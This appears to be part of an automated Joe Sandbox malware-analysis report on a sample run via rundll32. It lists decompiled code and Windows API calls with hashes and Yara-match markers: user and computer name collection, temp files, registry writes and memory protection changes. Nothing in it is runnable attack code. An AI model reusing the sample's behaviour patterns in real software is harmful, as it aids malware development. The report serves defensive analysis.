										_t64[_t57] = 0;     // NUL-terminate the UTF-8 result
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}

                          (Instruction address column for the listing above, 0x01002a1f through 0x01002ae3, one address per decompiled line; the side-by-side alignment was lost in extraction.)

                          APIs
                          • GetUserNameW.ADVAPI32(00000000,010057E7), ref: 01002A25
                          • GetComputerNameW.KERNEL32(00000000,010057E7), ref: 01002A41
                            • Part of subcall function 01006D63: RtlAllocateHeap.NTDLL(00000000,00000000,01005D7B), ref: 01006D6F
                          • GetUserNameW.ADVAPI32(00000000,010057E7), ref: 01002A7B
                          • GetComputerNameW.KERNEL32(010057E7,75BCC740), ref: 01002A9E
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,010057E7,00000000,010057E9,00000000,00000000,?,75BCC740,010057E7), ref: 01002AC1
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                          • String ID:
                          • API String ID: 3850880919-0
                          • Opcode ID: 7351eba421ca07c9f2baaa5fa78a8bf5492d916a6b5bb58dd275c5f072a21049
                          • Instruction ID: 81166a58c779a7f47ec8dafbaf3f95e5762f08f926ee7bb0987e9cd62b89fc2c
                          • Opcode Fuzzy Hash: 7351eba421ca07c9f2baaa5fa78a8bf5492d916a6b5bb58dd275c5f072a21049
                          • Instruction Fuzzy Hash: 7921FF75900208FFEB21DFE8D9848EEBBBCFF54200F1044AAE542E7140DA349B44CB10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B7508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B7509E
                            • Part of subcall function 05B7508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750B7
                            • Part of subcall function 05B7508C: GetCurrentThreadId.KERNEL32 ref: 05B750C4
                            • Part of subcall function 05B7508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750D0
                            • Part of subcall function 05B7508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750DE
                            • Part of subcall function 05B7508C: lstrcpy.KERNEL32(00000000), ref: 05B75100
                          • DeleteFileA.KERNEL32(00000000,000004D2), ref: 05B63090
                          • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 05B63099
                          • GetLastError.KERNEL32 ref: 05B630A3
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B63162
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileTemp$PathTime$CreateCurrentDeleteDirectoryErrorFreeHeapLastNameSystemThreadlstrcpy
                          • String ID:
                          • API String ID: 3543646443-0
                          • Opcode ID: af79d2601b0eb9f97aafcd6a7992585827e97e69c6ff2d9ab2ed8db5c8f343c1
                          • Instruction ID: 275a2962e0bb1802a469a8a885592d3c3aec6bf1968e972f489b4057b5a8b10a
                          • Opcode Fuzzy Hash: af79d2601b0eb9f97aafcd6a7992585827e97e69c6ff2d9ab2ed8db5c8f343c1
                          • Instruction Fuzzy Hash: 5E2141B2611218BBCB10B7E4EC4DEA63FADAF4A250B151052B715DB241DA38F905CFF9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B71C19: GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,05B6E231,00000000,76CDF5B0,05B70348,?,00000001), ref: 05B71C25
                            • Part of subcall function 05B71C19: _aulldiv.NTDLL(00000192,?,54D38000,00000192), ref: 05B71C3B
                            • Part of subcall function 05B71C19: _snwprintf.NTDLL ref: 05B71C60
                            • Part of subcall function 05B71C19: CreateFileMappingW.KERNEL32(000000FF,05B8A1E8,00000004,00000000,00001000,?), ref: 05B71C7C
                            • Part of subcall function 05B71C19: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 05B71C8E
                            • Part of subcall function 05B71C19: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?), ref: 05B71CC6
                          • UnmapViewOfFile.KERNEL32(?,00000001,?,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,05B6E231,00000000,76CDF5B0,05B70348,?,00000001), ref: 05B72F89
                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B72F92
                          • SetEvent.KERNEL32(?,00000001,?,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,05B6E231,00000000,76CDF5B0,05B70348,?,00000001), ref: 05B72FD9
                          • GetLastError.KERNEL32(05B73959,00000000,00000000,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B73008
                          • CloseHandle.KERNEL32(00000000,05B73959,00000000,00000000,?,?,?,?,?,?,?,05B69100,?), ref: 05B73018
                            • Part of subcall function 05B6C2AA: lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,?,?,05B6171E,?,?,00000000,?), ref: 05B6C2B6
                            • Part of subcall function 05B6C2AA: memcpy.NTDLL(00000000,00000000,00000000,00000002,?,?,05B6171E,?,?,00000000,?), ref: 05B6C2DE
                            • Part of subcall function 05B6C2AA: memset.NTDLL ref: 05B6C2F0
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseFileHandle$ErrorLastTime$CreateEventMappingSystemUnmapView_aulldiv_snwprintflstrlenmemcpymemset
                          • String ID:
                          • API String ID: 1106445334-0
                          • Opcode ID: 865d97f6202a4608f005d639b29f2cea1ce188ec6d4434ff8a562d55eb8aa49f
                          • Instruction ID: 42a0187439704e7b8ed02722e37f71be0beda031e1484bfb040d4349955f2aa1
                          • Opcode Fuzzy Hash: 865d97f6202a4608f005d639b29f2cea1ce188ec6d4434ff8a562d55eb8aa49f
                          • Instruction Fuzzy Hash: E9218431614709ABDB11ABB4DC49B7A7BEAFF00620B1414A5F962D7190EF30F942EB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,76C86920,00000000,?,?,?,05B6148A,?,?,?), ref: 05B7A66F
                          • GetFileSize.KERNEL32(00000000,00000000,?,?,05B6148A,?,?,?), ref: 05B7A67F
                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000,00000001,?,?,05B6148A,?,?,?), ref: 05B7A6AB
                          • GetLastError.KERNEL32(?,?,05B6148A,?,?,?), ref: 05B7A6D0
                          • CloseHandle.KERNEL32(000000FF,?,?,05B6148A,?,?,?), ref: 05B7A6E1
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseCreateErrorHandleLastReadSize
                          • String ID:
                          • API String ID: 3577853679-0
                          • Opcode ID: c2344705435e8f161b046ab928dc6d42d9a3a0be8279d0b6939e2c015e5208a7
                          • Instruction ID: bc1db07f48fd5bb69bcbf24dc72ed2411db53f1938f616e27af5c8f8151e9a18
                          • Opcode Fuzzy Hash: c2344705435e8f161b046ab928dc6d42d9a3a0be8279d0b6939e2c015e5208a7
                          • Instruction Fuzzy Hash: 1911B47210421CBFDB206F64CC88ABE7B6EFB446A0F1145A5F926A7180D670FD40A7A4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • StrChrA.SHLWAPI(?,0000002C,00000000,?,00000000,6E2AA0A7,6E2AA0A7,?,05B787C2,?,?,?,00000000,00000001,00000000,?), ref: 05B675E9
                          • StrRChrA.SHLWAPI(?,00000000,0000002F,?,00000000,6E2AA0A7,6E2AA0A7,?,05B787C2,?,?,?,00000000,00000001,00000000,?), ref: 05B67602
                          • StrTrimA.SHLWAPI(?,?,?,00000000,6E2AA0A7,6E2AA0A7,?,05B787C2,?,?,?,00000000,00000001,00000000,?,00000000), ref: 05B6762A
                          • StrTrimA.SHLWAPI(00000000,?,?,00000000,6E2AA0A7,6E2AA0A7,?,05B787C2,?,?,?,00000000,00000001,00000000,?,00000000), ref: 05B67639
                          • HeapFree.KERNEL32(00000000,?,?,00000000,?,00000000,00000000,?,00000000,6E2AA0A7,6E2AA0A7,?,05B787C2,?,?,?), ref: 05B67670
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Trim$FreeHeap
                          • String ID:
                          • API String ID: 2132463267-0
                          • Opcode ID: 653d34edc853fbf27066bf49f8fad65d42f4179897603693b1890c79a6730468
                          • Instruction ID: 21903540183113f4693d4e5f09544b263e01ffcc96906d8335aac60afdd284f4
                          • Opcode Fuzzy Hash: 653d34edc853fbf27066bf49f8fad65d42f4179897603693b1890c79a6730468
                          • Instruction Fuzzy Hash: E8118672200205BBDB119A5DDC85FBB7FADEB44694F111061BA09D7241EF74F801CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualProtect.KERNEL32(00000000,00000004,00000040,?,0042D5A8,?,?,00000000,00000000,?,05B7BF5B,00000000,00000000,05B610B0,00000000,05B89F2C), ref: 05B738D4
                          • VirtualProtect.KERNEL32(00000000,00000004,?,?,?,05B7BF5B,00000000,00000000,05B610B0,00000000,05B89F2C,00000008,00000003), ref: 05B73904
                          • RtlEnterCriticalSection.NTDLL(05B8A400), ref: 05B73913
                          • RtlLeaveCriticalSection.NTDLL(05B8A400), ref: 05B73931
                          • GetLastError.KERNEL32(?,05B7BF5B,00000000,00000000,05B610B0,00000000,05B89F2C,00000008,00000003), ref: 05B73941
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                          • String ID:
                          • API String ID: 653387826-0
                          • Opcode ID: 15abe869dae47e15e0feaf4b77cb9d7cad992d75294b229631b25eac0023fdde
                          • Instruction ID: f67d0e2a108c043d3b1fdfaf12810dd8682a7d5e83c1f35859e9a0de5a4bf6c0
                          • Opcode Fuzzy Hash: 15abe869dae47e15e0feaf4b77cb9d7cad992d75294b229631b25eac0023fdde
                          • Instruction Fuzzy Hash: 492109B5610706EFC720DFA8C985A6ABBF8FF08310710856AEA66D3740D770F944DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 05B77436
                          • GetLastError.KERNEL32 ref: 05B77459
                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 05B7746C
                          • GetLastError.KERNEL32 ref: 05B77477
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B774BF
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorHeapLast$AllocateFreeObjectSingleWait
                          • String ID:
                          • API String ID: 1671499436-0
                          • Opcode ID: cc1a77a051c180dffdae93e63196764500325c7ee9175904fc28957639be568e
                          • Instruction ID: 27ba0c9b62bde6c90c05ad24fea7f725c93f0957cd75ce0ae9304cf3f0eee808
                          • Opcode Fuzzy Hash: cc1a77a051c180dffdae93e63196764500325c7ee9175904fc28957639be568e
                          • Instruction Fuzzy Hash: CF216D70500248BBEF218B51D98EF6E7FBAFF40328F601498F562A65E0DB75B984DB11
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • InterlockedIncrement.KERNEL32(05B8A06C), ref: 05B73785
                          • HeapFree.KERNEL32(00000000,?,00000000,?,?,00000001,00000191), ref: 05B737DC
                          • InterlockedDecrement.KERNEL32(05B8A06C), ref: 05B737F1
                          • DeleteFileA.KERNEL32(00000000), ref: 05B7380F
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B7381D
                            • Part of subcall function 05B7508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B7509E
                            • Part of subcall function 05B7508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750B7
                            • Part of subcall function 05B7508C: GetCurrentThreadId.KERNEL32 ref: 05B750C4
                            • Part of subcall function 05B7508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750D0
                            • Part of subcall function 05B7508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750DE
                            • Part of subcall function 05B7508C: lstrcpy.KERNEL32(00000000), ref: 05B75100
                            • Part of subcall function 05B6A316: CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 05B6A391
                            • Part of subcall function 05B6A316: SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 05B6A3BD
                            • Part of subcall function 05B6A316: _allmul.NTDLL(?,?,FFFFD8F0,000000FF), ref: 05B6A3CD
                            • Part of subcall function 05B6A316: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,FFFFD8F0,000000FF), ref: 05B6A405
                            • Part of subcall function 05B6A316: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,FFFFD8F0,000000FF), ref: 05B6A427
                            • Part of subcall function 05B6A316: GetShellWindow.USER32 ref: 05B6A436
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileTempTimerWaitable$FreeHeapInterlockedPathTime$CreateCurrentDecrementDeleteIncrementMultipleNameObjectsShellSystemThreadWaitWindow_allmullstrcpy
                          • String ID:
                          • API String ID: 1587453479-0
                          • Opcode ID: 17e75dff65de0ad1a69a1972dab94f9cbf1da926c96e12e6198c8e4bcfa25110
                          • Instruction ID: 53866abf652054a40784ea539db11fd0b0cfc153a82336c2066e8fda1cbf89ce
                          • Opcode Fuzzy Hash: 17e75dff65de0ad1a69a1972dab94f9cbf1da926c96e12e6198c8e4bcfa25110
                          • Instruction Fuzzy Hash: 3A118E7560020CBFDB119FA0CC85EBE3FBEFB44291F1044A5FA05AA140DB75A980ABA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 05B626E7
                          • memcpy.NTDLL(00000000,?,?,?), ref: 05B62710
                          • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,?), ref: 05B62739
                          • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,00000000), ref: 05B62759
                          • RegCloseKey.ADVAPI32(?), ref: 05B62764
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Value$AllocateCloseCreateHeapmemcpy
                          • String ID:
                          • API String ID: 2954810647-0
                          • Opcode ID: faa332beba1ee5dcb47feec19cae87e198c61cf8bbb58387006f20f4423f1bdd
                          • Instruction ID: d5de5e38c336afc37887cf2127d387b653d785dbb82d222927398de24a90d42e
                          • Opcode Fuzzy Hash: faa332beba1ee5dcb47feec19cae87e198c61cf8bbb58387006f20f4423f1bdd
                          • Instruction Fuzzy Hash: AF118A36200109BFEF116E64ED89EBEBB6EFF44691F044061FD11A2190DA75AD10D762
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetSystemTimeAsFileTime.KERNEL32(05B6980C,?,?,?,?,00000008,05B6980C,00000000,?), ref: 05B6E59A
                          • memcpy.NTDLL(05B6980C,?,00000009,?,?,?,?,00000008,05B6980C,00000000,?), ref: 05B6E5BC
                          • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 05B6E5D4
                          • lstrlenW.KERNEL32(00000000,00000001,05B6980C,?,?,?,?,?,?,?,00000008,05B6980C,00000000,?), ref: 05B6E5F4
                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00000008,05B6980C,00000000,?), ref: 05B6E619
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: HeapTime$AllocateFileFreeSystemlstrlenmemcpy
                          • String ID:
                          • API String ID: 3065863707-0
                          • Opcode ID: e3c95c8c4e07d72be61536a623ddba8eab35995de3df617a4adee00da1541125
                          • Instruction ID: d0f09817729ad5f8d5cbf3d4d8d1f36c830e5b58f547adc12da453954c3b41c7
                          • Opcode Fuzzy Hash: e3c95c8c4e07d72be61536a623ddba8eab35995de3df617a4adee00da1541125
                          • Instruction Fuzzy Hash: 16118639E11208BBCB219BA4D809FEE7FBDEB08710F004051FA19E7280DA74F648DB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • lstrcmpi.KERNEL32(00000000,?), ref: 05B7FEC3
                          • RtlEnterCriticalSection.NTDLL(05B8A428), ref: 05B7FED0
                          • RtlLeaveCriticalSection.NTDLL(05B8A428), ref: 05B7FEE3
                          • lstrcmpi.KERNEL32(05B8A440,00000000), ref: 05B7FF03
                          • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,05B6404D,00000000), ref: 05B7FF17
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalSectionTimelstrcmpi$EnterFileLeaveSystem
                          • String ID:
                          • API String ID: 1266740956-0
                          • Opcode ID: deef6e734c80205a6be273351b140403b8a263f75ba4f41870a905b7527d4e4e
                          • Instruction ID: 2bafab562caec1f1e0c49df897dcd0c79ee0e40f48d9360ed76660513b4c9818
                          • Opcode Fuzzy Hash: deef6e734c80205a6be273351b140403b8a263f75ba4f41870a905b7527d4e4e
                          • Instruction Fuzzy Hash: A4118132915209EFCB14DB58D899ABABBF9FF45334B185096F425D7280DB38BD01CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • lstrlen.KERNEL32(?,00000000,05B83716,00000000,05B72466,?,?,?,05B78A07,?,?,?,00000000,00000001,00000000,?), ref: 05B6326D
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • lstrcpy.KERNEL32(00000000,?), ref: 05B63291
                          • StrRChrA.SHLWAPI(?,00000000,0000002E,?,00000003,?,?,05B78A07,?,?,?,00000000,00000001,00000000,?,00000000), ref: 05B63298
                          • lstrcpy.KERNEL32(00000000,?), ref: 05B632E0
                          • lstrcat.KERNEL32(00000000,?), ref: 05B632EF
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$AllocateHeaplstrcatlstrlen
                          • String ID:
                          • API String ID: 2616531654-0
                          • Opcode ID: 78888fb7d98c6401445a8d4780b62d993ecd59dae48e35eba8fc707e3fb9c61b
                          • Instruction ID: f9402725609369c834386bfb7535332a2a4920ba743eb9f8a3a217d9fad58873
                          • Opcode Fuzzy Hash: 78888fb7d98c6401445a8d4780b62d993ecd59dae48e35eba8fc707e3fb9c61b
                          • Instruction Fuzzy Hash: CA11A376200206ABC720DAA5DC8AE7B7BEDFB85210F054469F605D3140EF39F449C761
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B7D580: lstrlen.KERNEL32(00000000,00000000,?,00000000,05B6243E,00000000,00000000,00000000,00000000,?,00000022,00000000,00000000,00000000,?,?), ref: 05B7D58C
                          • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 05B7E3F6
                          • memcpy.NTDLL(00000000,?,?), ref: 05B7E409
                          • RtlEnterCriticalSection.NTDLL(05B8A428), ref: 05B7E41A
                          • RtlLeaveCriticalSection.NTDLL(05B8A428), ref: 05B7E42F
                          • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 05B7E467
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy
                          • String ID:
                          • API String ID: 2349942465-0
                          • Opcode ID: 3e61cea204b04d389bc669a9c41d15fd6716016433b2dc5d133a388b3b5e7edc
                          • Instruction ID: e5f4b13defd6ec5cffbcd4fe007311f100bb4447c528f42f5768e902d96447c7
                          • Opcode Fuzzy Hash: 3e61cea204b04d389bc669a9c41d15fd6716016433b2dc5d133a388b3b5e7edc
                          • Instruction Fuzzy Hash: 8511CE32215214AFC7206F28EC49C3B7BAEEF8533570551AAF92693240CA25BC04DBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • lstrlen.KERNEL32(05B6C1F8,00000000,00000000,00000000,?,05B70FD9,?,05B6C1F8,00000000), ref: 05B74D2D
                          • lstrlen.KERNEL32(?,?,05B70FD9,?,05B6C1F8,00000000), ref: 05B74D34
                          • RtlAllocateHeap.NTDLL(00000000,00000029), ref: 05B74D42
                            • Part of subcall function 05B6EEF2: GetLocalTime.KERNEL32(?,?,?,?,05B7FC9E,00000000,00000001), ref: 05B6EEFC
                            • Part of subcall function 05B6EEF2: wsprintfA.USER32 ref: 05B6EF2F
                          • wsprintfA.USER32 ref: 05B74D64
                            • Part of subcall function 05B6ED48: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,05B74D8C,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 05B6ED66
                            • Part of subcall function 05B6ED48: wsprintfA.USER32 ref: 05B6ED8B
                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 05B74D95
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: wsprintf$HeapTimelstrlen$AllocateFreeLocalSystem
                          • String ID:
                          • API String ID: 3847261958-0
                          • Opcode ID: 401e07799e19abe30d6d21427eaae3e9abc6fbea318d654b4f907084fba2a12c
                          • Instruction ID: 73fe99fe7e507ae16eb9f489a858f166ebfe6513b515899107ffeb0bbdb8a4ec
                          • Opcode Fuzzy Hash: 401e07799e19abe30d6d21427eaae3e9abc6fbea318d654b4f907084fba2a12c
                          • Instruction Fuzzy Hash: CE015E36240218BBDB111F25EC4ADAA7F6EEB84261F048062FD199B251DA36AD15DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • ResetEvent.KERNEL32(?,00000008,00000000,0000EA60,00000000,00000000,00000000,?,05B6DBAC,?,?,00000000,05B63EC6,?,00000000), ref: 05B7DD35
                          • ResetEvent.KERNEL32(?,?,05B6DBAC,?,?,00000000,05B63EC6,?,00000000), ref: 05B7DD3A
                          • GetLastError.KERNEL32(05B6DBAC,?,?,00000000,05B63EC6,?,00000000), ref: 05B7DD55
                          • GetLastError.KERNEL32(0000EA60,00000000,00000000,00000000,?,05B6DBAC,?,?,00000000,05B63EC6,?,00000000), ref: 05B7DD84
                            • Part of subcall function 05B6D429: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,05B7DD0F,00000000,00000000,00000004,00000000,?,05B6DBAC,?,?,00000000), ref: 05B6D435
                            • Part of subcall function 05B6D429: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,05B7DD0F,00000000,00000000,00000004,00000000,?,05B6DBAC,?), ref: 05B6D493
                            • Part of subcall function 05B6D429: lstrcpy.KERNEL32(00000000,00000000), ref: 05B6D4A3
                          • SetEvent.KERNEL32(?,05B6DBAC,?,?,00000000,05B63EC6,?,00000000), ref: 05B7DD76
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                          • String ID:
                          • API String ID: 1449191863-0
                          • Opcode ID: 8a24b21167802676405f41e838f00a192a704ab6faf35f027b5f44f013576e43
                          • Instruction ID: 6090759745bc9a701bfc79bd8a87a21deb6a16a5c3f6a3e3180795e9add44db0
                          • Opcode Fuzzy Hash: 8a24b21167802676405f41e838f00a192a704ab6faf35f027b5f44f013576e43
                          • Instruction Fuzzy Hash: AA115EB1100509AFDB31AE64DC49EAB3FAAFF083A4F104660F926910A0CB31F951DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,00004000,-00000008), ref: 05B80AB4
                            • Part of subcall function 05B7EC09: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 05B7EC20
                            • Part of subcall function 05B7EC09: SetEvent.KERNEL32(?,?,?,?,05B63EC6,?,?), ref: 05B7EC30
                          • lstrlen.KERNEL32(?,?,?,?,?,05B6859B,?,?), ref: 05B80AD7
                          • lstrlen.KERNEL32(?,?,?,?,05B6859B,?,?), ref: 05B80AE1
                          • memcpy.NTDLL(?,?,00004000,?,?,05B6859B,?,?), ref: 05B80AF2
                          • HeapFree.KERNEL32(00000000,?,?,?,?,05B6859B,?,?), ref: 05B80B14
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heaplstrlen$AllocateEventFreeObjectSingleWaitmemcpy
                          • String ID:
                          • API String ID: 442095154-0
                          • Opcode ID: d1b2c26887af6ff9c3204bbe9d45876af9e2d5f26d8d43949a1b0cc019b110ad
                          • Instruction ID: 497b52e6d5b68389f88a20ff887838368fd96f7cbed62e21903f8b2226e0d44d
                          • Opcode Fuzzy Hash: d1b2c26887af6ff9c3204bbe9d45876af9e2d5f26d8d43949a1b0cc019b110ad
                          • Instruction Fuzzy Hash: 48117075600208FFCB11AB55EC49E6A7FBAEB85354F2450A5F805A7250DA31FD04DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B6AE7C: lstrlen.KERNEL32(05B6E448,00000000,00000000,?,?,05B77A5B,?,?,?,?,05B6E448,?), ref: 05B6AE8B
                            • Part of subcall function 05B6AE7C: mbstowcs.NTDLL ref: 05B6AEA7
                          • lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,?,?,05B6E448,?), ref: 05B77A6A
